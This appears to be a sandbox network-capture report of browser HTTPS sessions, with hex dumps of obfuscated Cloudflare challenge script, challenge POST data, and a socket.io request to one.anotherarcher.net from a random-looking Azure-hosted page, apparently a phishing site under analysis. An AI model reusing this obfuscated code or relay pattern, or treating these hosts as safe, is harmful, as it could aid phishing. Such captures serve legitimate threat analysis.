                                                                                                                                                                                                                                2024-10-03 20:57:31 UTC1369INData Raw: 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 28 64 5b 67 52 28 31 36 33 38 29 5d 28 30 2c 4c 29 3f 31 3a 30 29 2a 46 2c 46 3c 3c 3d 31 29 3b 73 5b 42 2b 2b 5d 3d 65 28 4a 29 2c 4d 3d 42 2d 31 2c 78 2d 2d 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 20 44 5b 67 52 28 31 36 31 39 29 5d 28 27 27 29 7d 69 66 28 30 3d 3d 78 26 26 28 78 3d 4d 61 74 68 5b 67 52 28 31 31 38 38 29 5d 28 32 2c 43 29 2c 43 2b 2b 29 2c 73 5b 4d 5d 29 4d 3d 73 5b 4d 5d 3b 65 6c 73 65 20 69 66 28 64 5b 67 52 28 31 30 33 32 29 5d 28 4d 2c 42 29 29 4d 3d 45 2b 45 5b 67 52 28 36 34 38 29 5d 28 30 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 44 5b 67 52 28 39 38 39 29 5d 28 4d 29 2c 73 5b 42 2b 2b 5d 3d 45 2b 4d 5b 67 52 28 36 34 38 29 5d 28 30 29 2c 78 2d 2d 2c 45 3d
                                                                                                                                                                                                                                Data Ascii: G=o(I++)),J|=(d[gR(1638)](0,L)?1:0)*F,F<<=1);s[B++]=e(J),M=B-1,x--;break;case 2:return D[gR(1619)]('')}if(0==x&&(x=Math[gR(1188)](2,C),C++),s[M])M=s[M];else if(d[gR(1032)](M,B))M=E+E[gR(648)](0);else return null;D[gR(989)](M),s[B++]=E+M[gR(648)](0),x--,E=
                                                                                                                                                                                                                                2024-10-03 20:57:31 UTC1369INData Raw: 31 35 2c 63 5b 68 37 28 31 30 33 37 29 5d 28 65 32 2c 65 33 2d 31 29 3f 28 65 34 3d 30 2c 65 35 5b 68 37 28 39 38 39 29 5d 28 65 36 28 65 37 29 29 2c 65 38 3d 30 29 3a 65 39 2b 2b 2c 65 61 3e 3e 3d 31 2c 64 59 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 65 62 3d 31 2c 65 63 3d 30 3b 65 64 3c 65 65 3b 65 67 3d 63 5b 68 37 28 31 34 30 37 29 5d 28 65 68 3c 3c 31 2c 65 69 29 2c 63 5b 68 37 28 36 33 38 29 5d 28 65 6a 2c 65 6b 2d 31 29 3f 28 65 6c 3d 30 2c 65 6d 5b 68 37 28 39 38 39 29 5d 28 63 5b 68 37 28 31 38 38 34 29 5d 28 65 6e 2c 65 6f 29 29 2c 65 70 3d 30 29 3a 65 71 2b 2b 2c 65 72 3d 30 2c 65 66 2b 2b 29 3b 66 6f 72 28 65 73 3d 65 74 5b 68 37 28 31 31 37 36 29 5d 28 30 29 2c 65 75 3d 30 3b 31 36 3e 65 76 3b 65 78 3d 63 5b 68 37 28 31 34 30 37 29 5d 28 65
                                                                                                                                                                                                                                Data Ascii: 15,c[h7(1037)](e2,e3-1)?(e4=0,e5[h7(989)](e6(e7)),e8=0):e9++,ea>>=1,dY++);}else{for(eb=1,ec=0;ed<ee;eg=c[h7(1407)](eh<<1,ei),c[h7(638)](ej,ek-1)?(el=0,em[h7(989)](c[h7(1884)](en,eo)),ep=0):eq++,er=0,ef++);for(es=et[h7(1176)](0),eu=0;16>ev;ex=c[h7(1407)](e
                                                                                                                                                                                                                                2024-10-03 20:57:31 UTC1369INData Raw: 31 35 36 33 29 5d 3f 6b 5b 68 38 28 31 32 31 38 29 5d 28 27 68 2f 27 2c 65 4d 5b 68 38 28 31 38 30 33 29 5d 5b 68 38 28 31 35 36 33 29 5d 29 2b 27 2f 27 3a 27 27 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 69 66 28 21 44 29 72 65 74 75 72 6e 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 44 5b 68 38 28 31 33 37 30 29 5d 28 45 2c 46 2c 21 21 5b 5d 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 44 5b 68 38 28 31 35 35 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 35 27 3a 78 3d 28 73 3d 7b 7d 2c 73 5b 68 38 28 31 32 32 35 29 5d 3d 67 2c 73 2e 63 63 3d 68 2c 73 5b 68 38 28 31 38 39 32 29 5d 3d 47 2c 73 5b 68 38 28 31 30 34 37 29 5d 3d 43 2c 4a 53 4f 4e 5b 68 38 28 31 32 32 34 29 5d 28
                                                                                                                                                                                                                                Data Ascii: 1563)]?k[h8(1218)]('h/',eM[h8(1803)][h8(1563)])+'/':'';continue;case'2':if(!D)return;continue;case'3':D[h8(1370)](E,F,!![]);continue;case'4':D[h8(1555)]=function(){};continue;case'5':x=(s={},s[h8(1225)]=g,s.cc=h,s[h8(1892)]=G,s[h8(1047)]=C,JSON[h8(1224)](
                                                                                                                                                                                                                                2024-10-03 20:57:31 UTC1369INData Raw: 28 68 61 29 7b 68 61 3d 68 39 2c 65 4d 5b 68 61 28 31 34 37 39 29 5d 28 29 7d 2c 31 65 33 29 3a 28 6d 3d 5b 68 39 28 37 34 39 29 2b 64 2c 6a 5b 68 39 28 31 31 38 31 29 5d 2b 65 2c 6a 5b 68 39 28 31 36 30 30 29 5d 2b 66 2c 68 39 28 38 35 32 29 2b 67 2c 6a 5b 68 39 28 31 37 32 32 29 5d 28 68 39 28 31 35 34 37 29 2c 4a 53 4f 4e 5b 68 39 28 31 32 32 34 29 5d 28 68 29 29 5d 5b 68 39 28 31 36 31 39 29 5d 28 68 39 28 35 36 39 29 29 2c 65 4d 5b 68 39 28 38 31 31 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 62 2c 6f 2c 73 2c 76 29 7b 69 66 28 68 62 3d 68 39 2c 6a 5b 68 62 28 31 34 30 36 29 5d 28 6a 5b 68 62 28 31 30 35 30 29 5d 2c 6a 5b 68 62 28 31 38 38 33 29 5d 29 29 7b 73 3d 28 6f 3d 30 2c 30 29 3b 64 6f 7b 76 3d 6a 5b 68 62 28 37 33 38 29 5d 28 6f 2e 68 5b 35 33 2e
                                                                                                                                                                                                                                Data Ascii: (ha){ha=h9,eM[ha(1479)]()},1e3):(m=[h9(749)+d,j[h9(1181)]+e,j[h9(1600)]+f,h9(852)+g,j[h9(1722)](h9(1547),JSON[h9(1224)](h))][h9(1619)](h9(569)),eM[h9(811)](function(hb,o,s,v){if(hb=h9,j[hb(1406)](j[hb(1050)],j[hb(1883)])){s=(o=0,0);do{v=j[hb(738)](o.h[53.


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                114192.168.2.449875104.18.94.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:31 UTC926OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/223406031:1727987438:Xv_Al2IpeM4HkywcXvVtjay6EDDaGmub-i6LKQI9Wig/8ccfd82849af42f2/57d4757eac0388b HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Content-Length: 32135
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                CF-Challenge: 57d4757eac0388b
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/jrwmv/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:31 UTC16384OUTData Raw: 76 5f 38 63 63 66 64 38 32 38 34 39 61 66 34 32 66 32 3d 34 45 70 52 42 6d 51 6f 4a 54 4a 4b 63 76 46 47 41 47 6e 54 70 4b 6b 51 5a 47 6a 52 63 49 47 4c 45 47 79 76 47 58 49 65 67 51 64 47 51 52 59 6d 6f 47 68 47 50 4e 47 51 79 35 51 68 47 6a 59 55 4c 6f 47 58 6e 52 6d 41 47 46 59 4b 6e 31 58 47 51 6a 4e 51 51 47 55 2d 44 46 52 6d 63 47 78 47 50 70 51 33 66 2d 47 47 4c 47 34 75 59 6f 47 72 69 4a 47 62 30 70 2d 47 46 6f 6f 47 71 59 47 4d 45 52 35 2d 63 4a 4a 55 68 47 4b 4d 70 6e 54 70 47 31 47 76 35 47 65 59 70 79 41 59 6d 47 44 32 4a 50 41 33 46 59 75 54 75 63 52 47 68 4e 41 62 6d 6d 50 54 68 32 41 52 51 31 6e 4b 69 76 54 49 47 76 47 50 35 52 44 46 6f 24 47 4b 35 4d 36 6a 65 4c 42 68 62 6d 6b 4b 66 71 75 72 50 62 5a 73 37 55 30 66 38 4f 46 46 4b 75 64 4a
                                                                                                                                                                                                                                Data Ascii: v_8ccfd82849af42f2=4EpRBmQoJTJKcvFGAGnTpKkQZGjRcIGLEGyvGXIegQdGQRYmoGhGPNGQy5QhGjYULoGXnRmAGFYKn1XGQjNQQGU-DFRmcGxGPpQ3f-GGLG4uYoGriJGb0p-GFooGqYGMER5-cJJUhGKMpnTpG1Gv5GeYpyAYmGD2JPA3FYuTucRGhNAbmmPTh2ARQ1nKivTIGvGP5RDFo$GK5M6jeLBhbmkKfqurPbZs7U0f8OFFKudJ
                                                                                                                                                                                                                                2024-10-03 20:57:31 UTC15751OUTData Raw: 76 47 4e 38 42 6d 51 67 59 47 47 32 6c 4e 4d 48 69 6c 45 49 67 46 47 35 43 4b 70 51 76 47 46 6e 65 44 47 32 67 5a 4e 65 50 47 2b 43 53 43 44 34 47 2b 47 50 47 76 52 51 67 47 34 36 50 59 47 4c 47 49 37 50 70 51 54 63 55 52 55 50 47 62 47 65 47 6d 4a 51 69 47 51 52 65 4b 69 49 45 41 55 69 45 51 39 47 4d 59 51 47 47 33 47 38 4d 47 59 51 2d 47 41 49 65 44 47 49 47 6a 49 50 44 47 38 47 54 47 65 4c 47 49 47 35 59 50 4c 51 37 47 6e 52 70 44 47 32 47 34 63 46 79 69 66 59 50 47 55 52 4a 41 61 57 59 4b 47 47 70 49 4d 6d 75 65 52 6c 47 76 52 53 45 6d 51 47 4a 49 2b 45 6d 70 50 46 49 70 6a 69 4e 47 67 49 34 45 6d 33 47 59 49 53 44 47 70 49 50 6f 46 45 47 46 52 6f 67 47 45 6d 24 61 47 46 50 4f 49 47 47 2b 52 56 49 34 47 56 31 7a 71 66 55 52 47 46 65 6b 47 38 47 73 49
                                                                                                                                                                                                                                Data Ascii: vGN8BmQgYGG2lNMHilEIgFG5CKpQvGFneDG2gZNePG+CSCD4G+GPGvRQgG46PYGLGI7PpQTcURUPGbGeGmJQiGQReKiIEAUiEQ9GMYQGG3G8MGYQ-GAIeDGIGjIPDG8GTGeLGIG5YPLQ7GnRpDG2G4cFyifYPGURJAaWYKGGpIMmueRlGvRSEmQGJI+EmpPFIpjiNGgI4Em3GYISDGpIPoFEGFRogGEm$aGFPOIGG+RVI4GV1zqfURGFekG8GsI
                                                                                                                                                                                                                                2024-10-03 20:57:31 UTC300INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:31 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 26800
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                cf-chl-gen: rL3wve5hF3HE/W3xFXdefvGCNGgO+t8obBweywikjW/GwXpnT2wK/WJYyY5do9ULapEGv7Cqml6AV4f9$nlN5xVqN2HY0THpF
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd854988c43f2-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:31 UTC1069INData Raw: 6b 33 4f 50 6d 56 79 4d 62 70 56 79 65 33 61 62 63 4a 70 77 6d 35 4e 33 59 6d 53 69 70 47 5a 6f 70 71 6d 75 71 4a 2b 74 6e 70 4b 70 62 35 57 47 64 5a 46 38 6e 62 78 2f 6f 59 76 43 72 37 32 6e 6d 4b 44 4c 68 70 33 4d 69 63 65 65 6d 35 72 4a 6f 36 37 42 6c 70 6a 4a 6f 74 47 61 79 74 66 67 71 72 4f 71 6f 63 57 7a 34 4b 4c 45 78 74 58 62 32 74 6e 47 78 37 72 49 73 62 76 47 7a 65 44 67 74 64 6e 71 73 37 72 54 31 66 43 39 76 77 4f 2f 7a 4c 34 47 30 65 54 57 36 73 58 6f 32 74 66 66 37 63 76 6c 36 2b 76 4e 37 2b 33 73 44 4f 49 5a 39 39 51 65 37 2f 6a 74 41 79 4c 33 33 69 63 69 42 2b 45 73 48 68 6f 6b 48 2b 72 74 42 67 37 79 2f 53 44 76 39 51 45 48 44 41 67 55 4d 50 6f 66 48 6a 55 51 49 43 4a 48 42 7a 45 6f 47 42 34 59 4a 42 78 4e 42 6a 30 70 49 6b 74 57 4b 6b 78
                                                                                                                                                                                                                                Data Ascii: k3OPmVyMbpVye3abcJpwm5N3YmSipGZopqmuqJ+tnpKpb5WGdZF8nbx/oYvCr72nmKDLhp3Miceem5rJo67BlpjJotGaytfgqrOqocWz4KLExtXb2tnGx7rIsbvGzeDgtdnqs7rT1fC9vwO/zL4G0eTW6sXo2tff7cvl6+vN7+3sDOIZ99Qe7/jtAyL33iciB+EsHhokH+rtBg7y/SDv9QEHDAgUMPofHjUQICJHBzEoGB4YJBxNBj0pIktWKkx
                                                                                                                                                                                                                                2024-10-03 20:57:31 UTC1369INData Raw: 58 4f 70 6b 4c 69 54 6b 4c 47 57 73 61 36 36 77 4c 6d 6d 76 59 79 72 71 4b 36 6a 71 73 43 50 73 35 37 53 76 36 62 53 6d 63 61 75 70 39 6a 62 6e 4f 48 4b 6e 63 4c 46 76 74 4b 6b 77 39 54 6a 7a 62 2f 69 35 74 72 49 34 65 62 70 72 63 62 6c 74 66 6e 76 36 2f 4c 70 7a 2b 72 4f 75 62 76 75 30 2b 50 53 32 74 38 49 34 74 67 4a 78 4e 72 58 35 73 7a 6b 33 65 2f 55 43 64 51 4c 36 2b 37 71 38 2b 6a 58 36 52 44 59 46 76 54 74 34 41 49 48 34 79 4c 6e 35 68 30 76 4d 50 76 36 4a 50 7a 38 44 41 6f 76 39 69 63 73 45 76 6b 56 4e 7a 77 4a 46 2f 74 45 39 51 38 34 44 78 4d 52 4a 55 63 2b 4a 44 77 72 48 6b 34 65 47 78 30 73 4a 69 55 68 4e 53 39 4d 55 31 6f 61 50 52 59 35 57 43 77 37 4f 31 49 65 53 43 46 6c 52 6a 73 6d 4b 6d 70 59 50 46 70 54 58 32 64 33 59 6e 4a 4d 61 31 59 31
                                                                                                                                                                                                                                Data Ascii: XOpkLiTkLGWsa66wLmmvYyrqK6jqsCPs57Sv6bSmcaup9jbnOHKncLFvtKkw9Tjzb/i5trI4ebprcbltfnv6/Lpz+rOubvu0+PS2t8I4tgJxNrX5szk3e/UCdQL6+7q8+jX6RDYFvTt4AIH4yLn5h0vMPv6JPz8DAov9icsEvkVNzwJF/tE9Q84DxMRJUc+JDwrHk4eGx0sJiUhNS9MU1oaPRY5WCw7O1IeSCFlRjsmKmpYPFpTX2d3YnJMa1Y1
                                                                                                                                                                                                                                2024-10-03 20:57:31 UTC1369INData Raw: 33 44 65 34 4c 47 6e 72 4f 6a 68 38 62 43 72 4a 69 37 79 35 76 55 71 34 36 56 77 4b 76 44 77 36 2b 32 71 35 79 32 6d 39 69 55 74 36 2f 6a 70 4c 2f 66 78 39 32 6f 78 72 2b 35 34 65 66 6c 34 2b 6e 71 7a 2b 7a 4d 7a 4d 66 55 32 38 2f 4c 37 4d 7a 54 41 62 75 2b 34 38 4c 50 42 65 59 49 33 4d 6a 4b 42 67 77 4c 43 67 37 53 44 50 77 50 44 52 67 47 41 68 76 54 47 41 72 59 49 42 6f 66 37 69 4c 34 48 78 6b 6e 35 74 2f 38 4c 41 41 6a 46 2b 66 69 2f 68 45 51 41 42 59 79 45 65 38 62 4d 52 55 4f 4c 44 4c 34 43 30 48 30 2f 52 42 41 42 43 49 67 4d 69 64 41 49 67 51 6d 51 67 6c 53 4b 45 49 6c 51 6a 39 4c 51 53 67 71 50 46 63 55 4c 78 4a 5a 54 69 42 62 56 69 45 7a 4f 32 68 43 51 6b 5a 6e 58 6b 39 59 63 6e 42 30 55 32 6c 44 56 45 77 31 57 6e 52 59 64 44 78 2b 66 6b 70 4b 54
                                                                                                                                                                                                                                Data Ascii: 3De4LGnrOjh8bCrJi7y5vUq46VwKvDw6+2q5y2m9iUt6/jpL/fx92oxr+54efl4+nqz+zMzMfU28/L7MzTAbu+48LPBeYI3MjKBgwLCg7SDPwPDRgGAhvTGArYIBof7iL4Hxkn5t/8LAAjF+fi/hEQABYyEe8bMRUOLDL4C0H0/RBABCIgMidAIgQmQglSKEIlQj9LQSgqPFcULxJZTiBbViEzO2hCQkZnXk9YcnB0U2lDVEw1WnRYdDx+fkpKT
                                                                                                                                                                                                                                2024-10-03 20:57:31 UTC1369INData Raw: 37 75 6f 6d 6c 71 62 2b 6c 67 36 57 53 70 4c 4f 70 73 63 75 32 77 38 36 58 75 37 47 35 72 62 37 4c 31 73 54 44 75 63 44 62 78 74 50 68 71 2b 53 75 32 4f 6e 41 72 2b 44 47 33 62 2f 7a 30 66 4c 77 30 65 2f 5a 38 37 6e 4d 37 4c 2b 31 33 76 76 36 78 65 48 59 77 74 58 6d 2b 2f 37 4f 36 51 48 4e 37 75 30 4f 41 75 63 4a 31 76 72 56 36 41 67 5a 38 50 44 37 49 66 34 42 35 42 34 41 43 69 49 46 34 68 73 63 42 53 55 51 42 42 44 74 45 77 41 54 37 54 6b 49 4f 77 51 4f 43 79 73 62 4d 76 30 54 47 50 30 62 49 43 4d 41 47 44 30 45 48 55 49 46 4a 6b 6f 79 4c 56 45 65 4c 43 77 56 46 7a 6f 31 57 42 64 4e 57 43 6f 70 4b 31 4e 57 4e 55 45 66 49 69 4d 70 5a 43 78 61 51 6b 34 76 53 43 52 73 59 69 39 4d 56 6d 46 73 56 30 74 79 61 6c 74 51 59 44 6c 4f 66 6d 4b 42 65 55 43 4a 5a 31
                                                                                                                                                                                                                                Data Ascii: 7uomlqb+lg6WSpLOpscu2w86Xu7G5rb7L1sTDucDbxtPhq+Su2OnAr+DG3b/z0fLw0e/Z87nM7L+13vv6xeHYwtXm+/7O6QHN7u0OAucJ1vrV6AgZ8PD7If4B5B4ACiIF4hscBSUQBBDtEwAT7TkIOwQOCysbMv0TGP0bICMAGD0EHUIFJkoyLVEeLCwVFzo1WBdNWCopK1NWNUEfIiMpZCxaQk4vSCRsYi9MVmFsV0tyaltQYDlOfmKBeUCJZ1
                                                                                                                                                                                                                                2024-10-03 20:57:31 UTC1369INData Raw: 7a 35 79 63 30 62 47 6a 6e 34 37 47 7a 72 6d 4f 71 62 6e 4e 79 70 2f 61 71 35 75 74 35 37 4f 78 78 75 6d 71 33 4d 65 35 33 63 50 45 72 62 33 6a 38 39 4c 41 39 76 71 30 78 73 6a 35 74 62 58 33 32 76 44 43 7a 74 33 2b 31 76 62 41 39 64 30 4c 76 38 44 6a 7a 51 58 7a 45 78 49 45 36 65 62 68 37 65 54 6b 44 42 67 5a 47 39 63 65 49 4f 7a 31 39 42 33 39 47 68 63 6a 4a 2f 51 48 42 77 41 75 42 76 37 39 2f 51 50 74 39 67 51 6b 38 67 62 37 46 76 67 31 2b 41 6f 69 45 42 49 56 52 78 6b 6a 53 44 63 30 49 43 30 64 48 43 6b 4f 52 52 39 53 53 46 41 78 4f 42 56 58 4f 31 45 2b 58 6a 4e 54 4c 6c 38 69 51 53 4e 5a 4a 7a 30 37 57 30 42 65 62 57 56 51 59 7a 46 75 55 47 78 4f 5a 6e 46 52 55 46 64 62 62 7a 55 78 57 56 35 78 58 31 74 66 51 33 5a 54 59 7a 78 58 56 30 64 39 69 56 70
                                                                                                                                                                                                                                Data Ascii: z5yc0bGjn47GzrmOqbnNyp/aq5ut57Oxxumq3Me53cPErb3j89LA9vq0xsj5tbX32vDCzt3+1vbA9d0Lv8DjzQXzExIE6ebh7eTkDBgZG9ceIOz19B39GhcjJ/QHBwAuBv79/QPt9gQk8gb7Fvg1+AoiEBIVRxkjSDc0IC0dHCkORR9SSFAxOBVXO1E+XjNTLl8iQSNZJz07W0BebWVQYzFuUGxOZnFRUFdbbzUxWV5xX1tfQ3ZTYzxXV0d9iVp
                                                                                                                                                                                                                                2024-10-03 20:57:31 UTC1369INData Raw: 64 65 6b 72 4b 58 61 33 63 37 4a 30 35 6e 4f 33 62 47 34 33 4f 58 68 6f 4d 4b 34 31 65 4c 4b 71 74 76 6e 33 73 58 7a 77 4d 6a 42 39 76 6e 71 35 65 2b 31 36 76 69 34 31 50 67 43 2f 73 33 65 31 50 47 37 77 77 7a 30 78 68 44 66 45 51 7a 71 46 41 4d 51 36 67 34 4f 36 67 62 36 46 64 58 34 31 2f 54 7a 45 78 38 6b 38 42 76 36 2f 68 63 43 35 53 67 62 43 2b 6b 63 4b 78 50 72 4e 43 67 66 39 51 33 76 4a 2f 50 38 47 53 72 34 50 44 4d 69 45 43 38 42 4b 41 4d 34 51 30 56 4e 44 51 77 75 43 43 59 4d 4f 77 30 71 51 44 41 54 57 45 39 47 4b 55 67 64 52 78 34 32 47 44 30 66 5a 44 56 56 4f 56 68 66 56 6a 64 73 4c 56 73 2f 59 55 70 66 51 58 56 73 61 55 5a 6f 65 46 78 4c 66 44 6c 72 55 55 6f 39 57 6a 36 45 66 49 46 44 53 45 68 32 52 6f 6c 6c 62 6c 35 38 53 59 68 6c 6c 57 61 45
                                                                                                                                                                                                                                Data Ascii: dekrKXa3c7J05nO3bG43OXhoMK41eLKqtvn3sXzwMjB9vnq5e+16vi41PgC/s3e1PG7wwz0xhDfEQzqFAMQ6g4O6gb6FdX41/TzEx8k8Bv6/hcC5SgbC+kcKxPrNCgf9Q3vJ/P8GSr4PDMiEC8BKAM4Q0VNDQwuCCYMOw0qQDATWE9GKUgdRx42GD0fZDVVOVhfVjdsLVs/YUpfQXVsaUZoeFxLfDlrUUo9Wj6EfIFDSEh2Rollbl58SYhllWaE
                                                                                                                                                                                                                                2024-10-03 20:57:31 UTC1369INData Raw: 57 76 71 72 48 50 74 4b 33 42 31 72 62 59 74 65 47 39 33 4c 58 64 77 65 44 6e 35 4d 44 4f 79 65 48 47 36 4e 48 6e 7a 4d 57 34 37 4d 37 61 38 39 2f 54 42 66 66 30 31 2b 4c 52 39 39 7a 57 34 51 44 66 41 4f 30 46 34 68 58 70 41 75 6a 69 44 41 76 72 39 68 41 4f 37 50 72 35 45 2f 50 39 34 42 2f 35 41 75 41 61 2b 78 77 4b 48 41 41 4c 2b 53 51 45 4e 50 41 6f 43 41 4d 73 47 41 77 73 39 44 41 50 51 54 51 36 46 44 55 38 50 68 67 53 4a 6a 73 65 50 53 49 37 49 43 73 61 53 69 55 66 53 45 34 6c 4d 79 35 4c 4b 31 30 79 54 6a 41 72 56 46 51 30 50 69 56 45 4f 47 67 70 57 7a 74 48 59 47 5a 43 53 30 4a 69 52 54 35 53 61 55 68 34 4d 58 4a 4d 66 56 4a 77 54 33 46 30 63 6c 46 66 58 6e 35 5a 55 6b 56 39 58 6e 31 61 65 6d 42 72 59 6e 42 6a 62 32 4b 49 61 4a 6c 75 6a 47 74 33 5a
                                                                                                                                                                                                                                Data Ascii: WvqrHPtK3B1rbYteG93LXdweDn5MDOyeHG6NHnzMW47M7a89/TBff01+LR99zW4QDfAO0F4hXpAujiDAvr9hAO7Pr5E/P94B/5AuAa+xwKHAAL+SQENPAoCAMsGAws9DAPQTQ6FDU8PhgSJjsePSI7ICsaSiUfSE4lMy5LK10yTjArVFQ0PiVEOGgpWztHYGZCS0JiRT5SaUh4MXJMfVJwT3F0clFfXn5ZUkV9Xn1aemBrYnBjb2KIaJlujGt3Z
                                                                                                                                                                                                                                2024-10-03 20:57:31 UTC1369INData Raw: 69 75 72 58 52 75 64 53 36 36 36 54 6a 77 50 44 6e 30 63 4c 4f 30 65 6e 47 30 65 2f 6b 79 2b 75 37 7a 4e 44 35 30 66 77 46 78 50 62 33 31 66 44 45 2f 74 76 6d 44 67 76 67 2f 41 7a 78 79 2f 37 54 39 63 37 74 30 2f 76 75 37 74 67 4a 38 42 48 78 45 50 45 68 4a 78 54 65 4a 66 30 45 4a 76 59 57 35 54 48 36 41 51 45 42 48 69 67 72 4d 77 30 34 4b 7a 73 73 48 50 73 52 4f 68 30 58 46 41 51 6d 4a 45 52 4a 4d 67 4a 4e 46 79 6b 64 48 54 70 51 52 30 38 70 56 45 4a 58 53 44 67 54 4c 56 59 35 4d 79 39 62 51 6b 42 66 56 55 34 65 61 54 49 67 4f 54 6c 57 57 47 4e 72 52 58 42 68 63 32 56 33 54 6a 46 50 54 6c 78 31 66 56 35 75 55 30 70 42 62 6c 56 43 52 59 47 42 69 49 68 31 57 6f 6d 50 66 45 65 4e 5a 6d 79 51 58 33 36 55 61 32 36 54 63 6d 70 33 62 6f 78 78 58 6d 47 4c 58 6d
                                                                                                                                                                                                                                Data Ascii: iurXRudS666TjwPDn0cLO0enG0e/ky+u7zND50fwFxPb31fDE/tvmDgvg/Azxy/7T9c7t0/vu7tgJ8BHxEPEhJxTeJf0EJvYW5TH6AQEBHigrMw04KzssHPsROh0XFAQmJERJMgJNFykdHTpQR08pVEJXSDgTLVY5My9bQkBfVU4eaTIgOTlWWGNrRXBhc2V3TjFPTlx1fV5uU0pBblVCRYGBiIh1WomPfEeNZmyQX36Ua26Tcmp3boxxXmGLXm


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                115192.168.2.44987479.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:31 UTC728OUTPOST /socket.io/?EIO=4&transport=polling&t=P9KB6fK&sid=HxCTxStOpXjLKRD_AANa HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Content-Length: 1
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Content-type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Origin: https://q0ednre2adn0en00.z1.web.core.windows.net
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://q0ednre2adn0en00.z1.web.core.windows.net/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:31 UTC1OUTData Raw: 31
                                                                                                                                                                                                                                Data Ascii: 1
                                                                                                                                                                                                                                2024-10-03 20:57:31 UTC207INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:31 GMT
                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                2024-10-03 20:57:31 UTC52INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 29{"code":1,"message":"Session ID unknown"}0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                116192.168.2.449876104.18.95.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:32 UTC433OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ccfd84d0859428f&lang=auto HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
